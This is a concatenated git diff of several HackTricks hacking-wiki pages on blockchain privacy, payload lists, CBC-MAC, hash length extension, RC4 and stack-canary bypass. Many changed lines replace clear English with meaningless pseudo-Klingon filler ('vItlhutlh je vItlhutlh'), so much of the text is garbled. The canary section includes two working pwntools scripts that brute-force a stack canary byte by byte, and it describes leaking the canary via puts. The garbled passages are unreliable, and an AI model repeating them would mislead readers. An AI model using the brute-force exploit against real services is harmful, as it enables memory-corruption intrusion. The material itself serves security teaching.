Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they **guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) and [**blog**](https://websec.nl/blog/)! Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they **guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) je [**blog**](https://websec.nl/blog/)!
In addition to the above WebSec is also a **committed supporter of HackTricks.** In addition to the above WebSec is also a **committed supporter of HackTricks.**
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %} {% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
## License & Disclaimer ## License & Disclaimer
**Check them in:** **Check them in:**

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -20,7 +18,7 @@ Other ways to support HackTricks:
- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries. - **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries.
- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end. - **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end.
- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts. - **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts.
- **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership. - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership.
- **DeFi** stands for Decentralized Finance, offering financial services without central authorities. - **DeFi** stands for Decentralized Finance, offering financial services without central authorities.
- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively. - **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively.
@ -84,14 +82,10 @@ Transactions can be visualized as graphs, revealing potential connections betwee
This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender. This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender.
### Example ### Example
```bash ```bash
2 btc --> 4 btc 2 btc --> 4 btc
3 btc 1 btc 3 btc 1 btc
``` ```
If adding more inputs makes the change output larger than any single input, it can confuse the heuristic.
## **Forced Address Reuse** ## **Forced Address Reuse**
Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together. Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together.
@ -138,55 +132,54 @@ For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar se
## PayJoin ## PayJoin
A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities. A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities.
```plaintext ```plaintext
2 btc --> 3 btc 2 btc --> 3 btc
5 btc 4 btc 5 btc 4 btc
``` ```
**tlhIngan Hol:**
Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions. **vItlhutlh:** yIqaw PayJoin, vItlhutlh privacy vItlhutlh je vItlhutlh bitcoin transactions.
**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy. **PayJoin vItlhutlh** vItlhutlh je vItlhutlh traditional surveillance methods, vItlhutlh je vItlhutlh promising development vItlhutlh transactional privacy.
# **Cryptocurrencies vItlhutlh Best Practices for Privacy**
# Best Practices for Privacy in Cryptocurrencies
## **Wallet Synchronization Techniques** ## **Wallet Synchronization Techniques**
To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out: vItlhutlh je vItlhutlh privacy je vItlhutlh security, vItlhutlh je vItlhutlh synchronizing wallets je vItlhutlh blockchain. vItlhutlh je vItlhutlh methods:
- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in. - **Full node**: vItlhutlh je vItlhutlh blockchain vItlhutlh, vItlhutlh je vItlhutlh maximum privacy. vItlhutlh je vItlhutlh transactions vItlhutlh stored locally, vItlhutlh je vItlhutlh impossible je vItlhutlh adversaries je vItlhutlh transactions je vItlhutlh addresses je vItlhutlh user je vItlhutlh interested.
- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found. - **Client-side block filtering**: vItlhutlh je vItlhutlh creating filters vItlhutlh je vItlhutlh block vItlhutlh blockchain, vItlhutlh je vItlhutlh wallets je vItlhutlh relevant transactions je vItlhutlh exposing specific interests je vItlhutlh network observers. Lightweight wallets vItlhutlh download filters, vItlhutlh fetching full blocks je vItlhutlh match je vItlhutlh user's addresses je vItlhutlh found.
## **Utilizing Tor for Anonymity** ## **Tor je vItlhutlh Utilizing je Anonymity**
Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network. Bitcoin vItlhutlh je vItlhutlh peer-to-peer network, vItlhutlh je vItlhutlh Tor je vItlhutlh recommended je vItlhutlh IP address, vItlhutlh je vItlhutlh privacy je vItlhutlh interacting je vItlhutlh network.
## **Preventing Address Reuse** ## **Preventing Address Reuse**
To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design. vItlhutlh je vItlhutlh privacy, vItlhutlh je vItlhutlh vital je vItlhutlh new address je vItlhutlh transaction. vItlhutlh je vItlhutlh address reuse vItlhutlh compromise privacy je vItlhutlh linking transactions je vItlhutlh entity. Modern wallets vItlhutlh discourage address reuse je vItlhutlh design.
## **Strategies for Transaction Privacy** ## **Strategies je vItlhutlh Transaction Privacy**
- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks. - **Multiple transactions**: vItlhutlh je vItlhutlh splitting payment je vItlhutlh several transactions vItlhutlh obscure transaction amount, vItlhutlh je vItlhutlh privacy attacks.
- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods. - **Change avoidance**: vItlhutlh je vItlhutlh transactions vItlhutlh je vItlhutlh require change outputs vItlhutlh je vItlhutlh privacy je vItlhutlh disrupting change detection methods.
- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy. - **Multiple change outputs**: vItlhutlh je vItlhutlh avoiding change vItlhutlh feasible, vItlhutlh je vItlhutlh multiple change outputs vItlhutlh je vItlhutlh improve privacy.
# **Monero: A Beacon of Anonymity** # **Monero: vItlhutlh Beacon je Anonymity**
Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy. Monero vItlhutlh je vItlhutlh need je vItlhutlh absolute anonymity je vItlhutlh digital transactions, vItlhutlh je vItlhutlh high standard je vItlhutlh privacy.
# **Ethereum: Gas and Transactions** # **Ethereum: Gas je vItlhutlh Transactions**
## **Understanding Gas** ## **Understanding Gas**
Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded. Gas vItlhutlh je vItlhutlh computational effort je vItlhutlh execute operations je vItlhutlh Ethereum, vItlhutlh je vItlhutlh **gwei**. vItlhutlh je vItlhutlh transaction costing 2,310,000 gwei (je 0.00231 ETH) vItlhutlh je vItlhutlh gas limit je vItlhutlh base fee, vItlhutlh je vItlhutlh tip je vItlhutlh incentivize miners. Users vItlhutlh set max fee je vItlhutlh they don't overpay, vItlhutlh je vItlhutlh excess refunded.
## **Executing Transactions** ## **Executing Transactions**
Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data. Transactions je vItlhutlh Ethereum vItlhutlh je vItlhutlh sender je vItlhutlh recipient, vItlhutlh je vItlhutlh user je vItlhutlh smart contract addresses. vItlhutlh je vItlhutlh fee vItlhutlh je vItlhutlh must be mined. Essential information je vItlhutlh transaction vItlhutlh je vItlhutlh recipient, sender's signature, value, optional data, gas limit, vItlhutlh fees. Notably, vItlhutlh je vItlhutlh sender's address vItlhutlh deduced je vItlhutlh signature, vItlhutlh je vItlhutlh need vItlhutlh je vItlhutlh transaction data.
These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security. vItlhutlh je vItlhutlh practices je vItlhutlh mechanisms vItlhutlh foundational je vItlhutlh anyone looking je vItlhutlh engage je vItlhutlh cryptocurrencies je vItlhutlh prioritizing privacy je vItlhutlh security.
## References ## References
@ -212,5 +205,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -1,26 +1,24 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: lo'laHbe'chugh HackTricks vItlhutlh:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * qaStaHvIS **company HackTricks advertise** pe'vIl **download HackTricks PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ghaH.
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) jImej collection [**NFTs**](https://opensea.io/collection/the-peass-family) ghaH.
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) pe'vIl [**telegram group**](https://t.me/peass) pe'vIl **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) pe'vIl [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
# Basic Payloads # Basic Payloads
* **Simple List:** Just a list containing an entry in each line * **Simple List:** DaH jatlh vItlhutlh entry.
* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists. * **Runtime File:** vItlhutlh vItlhutlh (not loaded in memory) vItlhutlh. vItlhutlh vItlhutlh.
* **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-. * **Case Modification:** vItlhutlh vItlhutlh vItlhutlh (No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
* **Numbers:** Generate numbers from X to Y using Z step or randomly. * **Numbers:** X to Y numbers vItlhutlh Z step randomly.
* **Brute Forcer:** Character set, min & max length. * **Brute Forcer:** Character set, min & max length.
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab. [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
@ -32,16 +30,14 @@ Other ways to support HackTricks:
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: lo'laHbe'chugh HackTricks vItlhutlh:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * qaStaHvIS **company HackTricks advertise** pe'vIl **download HackTricks PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ghaH.
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) jImej collection [**NFTs**](https://opensea.io/collection/the-peass-family) ghaH.
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) pe'vIl [**telegram group**](https://t.me/peass) pe'vIl **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) pe'vIl [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -70,7 +68,7 @@ More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -81,5 +79,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -23,8 +21,8 @@ Imagine a server which is **signing** some **data** by **appending** a **secret*
* **The clear text data** * **The clear text data**
* **The algorithm (and it's vulnerable to this attack)** * **The algorithm (and it's vulnerable to this attack)**
* **The padding is known** * **The padding is known**
* Usually a default one is used, so if the other 3 requirements are met, this also is * Usually a default one is used, so if the other 3 requirements are met, this also is
* The padding vary depending on the length of the secret+data, that's why the length of the secret is needed * The padding vary depending on the length of the secret+data, that's why the length of the secret is needed
Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**. Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**.
@ -62,5 +60,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -1,23 +1,21 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: HackTricks poH:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **HackTricks vItlhutlh advertise** vaj **HackTricks PDF download** law' check [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ghaH.
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) jImej collection [**NFTs**](https://opensea.io/collection/the-peass-family) ghaH.
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) vaj [**telegram group**](https://t.me/peass) **join** vaj **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Hacking tricks yIqIm** [**HackTricks**](https://github.com/carlospolop/hacktricks) vaj [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos yIlo'laH.
</details> </details>
If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function. vaj jImej plaintext RC4 encrypt, vaj jImej RC4 (password vItlhutlh) encrypt content decrypt vItlhutlh function vaj.
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: vaj jImej plaintext encrypt vaj password extract vItlhutlh. HTB Kryptos machine references jImej:
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
@ -29,16 +27,14 @@ If you can encrypt a known plaintext you can also extract the password. More ref
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: HackTricks poH:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **HackTricks vItlhutlh advertise** vaj **HackTricks PDF download** law' check [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ghaH.
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) jImej collection [**NFTs**](https://opensea.io/collection/the-peass-family) ghaH.
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) vaj [**telegram group**](https://t.me/peass) **join** vaj **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Hacking tricks yIqIm** [**HackTricks**](https://github.com/carlospolop/hacktricks) vaj [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos yIlo'laH.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -1,16 +1,16 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a> <strong>tlhIngan Hol</strong></summary>
Other ways to support HackTricks: **HackTricks** **yIqImqa'** **tlhIngan Hol** **ghItlh** **'ej** **PDF** **ghItlh** **Download** **'ej** **HackTricks** **advertised** **'oH** **company** **tlhIngan Hol** **SUBSCRIPTION PLANS** **Check** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **ghItlh**!
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! **PEASS & HackTricks swag** **ghItlh** **official PEASS & HackTricks swag** **ghItlh** [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) **The PEASS Family** **ghItlh** **PEASS Family** **ghItlh** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **ghItlh** **NFTs** **ghItlh** [**NFTs**](https://opensea.io/collection/the-peass-family) **ghItlh** **exclusive** **collection** **ghItlh**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. **Join the** 💬 **Discord group** **ghItlh** [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** **ghItlh** [**telegram group**](https://t.me/peass) **follow** **ghItlh** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)
**Share your hacking tricks by submitting PRs to the** **HackTricks** **HackTricks Cloud** **ghItlh** **github repos** **ghItlh** [**HackTricks**](https://github.com/carlospolop/hacktricks) **HackTricks Cloud** **ghItlh** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)
</details> </details>
@ -33,38 +33,37 @@ Then, the best way to bypass the canary is just to **brute-force it char by char
## Example 1 ## Example 1
This example is implemented for 64bits but could be easily implemented for 32 bits. This example is implemented for 64bits but could be easily implemented for 32 bits.
```python ```python
from pwn import * from pwn import *
def connect(): def connect():
r = remote("localhost", 8788) r = remote("localhost", 8788)
def get_bf(base): def get_bf(base):
canary = "" canary = ""
guess = 0x0 guess = 0x0
base += canary base += canary
while len(canary) < 8: while len(canary) < 8:
while guess != 0xff: while guess != 0xff:
r = connect() r = connect()
r.recvuntil("Username: ") r.recvuntil("Username: ")
r.send(base + chr(guess)) r.send(base + chr(guess))
if "SOME OUTPUT" in r.clean(): if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x') print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess) canary += chr(guess)
base += chr(guess) base += chr(guess)
guess = 0x0 guess = 0x0
r.close() r.close()
break break
else: else:
guess += 1 guess += 1
r.close() r.close()
print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base return base
canary_offset = 1176 canary_offset = 1176
base = "A" * canary_offset base = "A" * canary_offset
@ -72,43 +71,43 @@ print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
``` ```
## Example 2 ## Example 2
This is implemented for 32 bits, but this could be easily changed to 64bits.\ **tlhIngan Hol:**
Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.
qaStaHvIS 32 bitpu'DI' vaj, 'ej 64 bitpu'DI' vaj 'e' vItlhutlh.\
'ej vaj Example 2 vIlo'laHbe'chugh, **program vItlhutlhlaHbe'chugh vay' payload vIlo'laHbe'chugh byte vItlhutlhlaH**.
```python ```python
from pwn import * from pwn import *
# Here is the function to brute force the canary # Here is the function to brute force the canary
def breakCanary(): def breakCanary():
known_canary = b"" known_canary = b""
test_canary = 0x0 test_canary = 0x0
len_bytes_to_read = 0x21 len_bytes_to_read = 0x21
for j in range(0, 4): for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte # Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff): for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
# Send the current input size # Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little")) target.send(len_bytes_to_read.to_bytes(1, "little"))
# Send this iterations canary # Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
# Scan in the output, determine if we have a correct value # Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.") output = target.recvuntil(b"exit.")
if b"YUM" in output: if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on # If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary)) print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little") known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1 len_bytes_to_read += 1
break break
# Return the canary # Return the canary
return known_canary return known_canary
# Start the target process # Start the target process
target = process('./feedme') target = process('./feedme')
@ -118,24 +117,22 @@ target = process('./feedme')
canary = breakCanary() canary = breakCanary()
log.info(f"The canary is: {canary}") log.info(f"The canary is: {canary}")
``` ```
# Print Canary # Print Canary
Another way to bypass the canary is to **print it**.\ **Qa'vIn** vItlhutlh **canary** **bypass** **way**.\
Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\ **program vulnerable** **stack overflow** **Dochvam** **puts** **function** **point** **part** **stack overflow**. **attacker** **first byte canary** **null byte** (`\x00`) **rest canary** **random** bytes. **attacker** **overflow** **stack** **first byte canary**.\
Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).\ **attacker** **puts functionality** **call** **middle** **payload** **print canary** (except **first null byte**).\
With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session) **info** **attacker** **craft** **send new attack** **knowing canary** (in **same program session**)
